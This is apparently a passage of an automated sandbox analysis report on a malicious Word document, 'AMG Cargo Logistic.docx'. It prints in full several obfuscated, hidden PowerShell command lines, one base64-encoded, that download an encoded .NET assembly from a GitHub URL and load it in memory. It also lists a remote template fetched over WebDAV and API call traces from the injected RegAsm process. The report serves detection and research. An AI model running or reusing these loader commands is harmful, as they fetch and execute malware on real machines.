                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000C.00000002.442834589.00000000002B9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: AMG Cargo Logistic.docxInitial sample: OLE summary lastprinted = 2024-07-15 15:30:47
                  Source: AMG Cargo Logistic.docxInitial sample: OLE indicators vbamacros = False

                  Data Obfuscation

                  barindex
                  Obfuscated command line found
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))"Jump to behavior
                  Suspicious powershell command line found
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,13_2_0041CBE1
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_00658F37 push eax; retf 8_2_00658F61
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_0065C333 push A00065C4h; ret 8_2_0065C3F5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_0065C3E0 push A00065C4h; ret 8_2_0065C3F5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_0065C28C pushad ; retn 0065h8_2_0065C28D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00457186 push ecx; ret 13_2_00457199
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0045E55D push esi; ret 13_2_0045E566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00457AA8 push eax; ret 13_2_00457AC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00434EB6 push ecx; ret 13_2_00434EC9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_10002806 push ecx; ret 13_2_10002819
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044693D push ecx; ret 16_2_0044694D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044DB70 push eax; ret 16_2_0044DB84
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044DB70 push eax; ret 16_2_0044DBAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00451D54 push eax; ret 16_2_00451D61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0044B090 push eax; ret 17_2_0044B0A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0044B090 push eax; ret 17_2_0044B0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00451D34 push eax; ret 17_2_00451D41
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00444E71 push ecx; ret 17_2_00444E81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00414060 push eax; ret 18_2_00414074
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00414060 push eax; ret 18_2_0041409C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00414039 push ecx; ret 18_2_00414049
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004164EB push 0000006Ah; retf 18_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00416553 push 0000006Ah; retf 18_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00416555 push 0000006Ah; retf 18_2_004165C4

                  Persistence and Installation Behavior

                  barindex
                  Microsoft Office launches external ms-search protocol handler (WebDAV)
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\og1.in@SSL\DavWWWRootJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\og1.in@SSL\DavWWWRootJump to behavior
                  Contains an external reference to another file
                  Source: settings.xml.relsExtracted files from sample: https://og1.in/s7uyq0
                  Office drops RTF file
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever[1].doc.0.drJump to dropped file
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: A16B3B5D.doc.0.drJump to dropped file
                  Office viewer loads remote template
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00406EEB ShellExecuteW,URLDownloadToFileW,13_2_00406EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,13_2_0041AADB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,13_2_0041CBE1
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
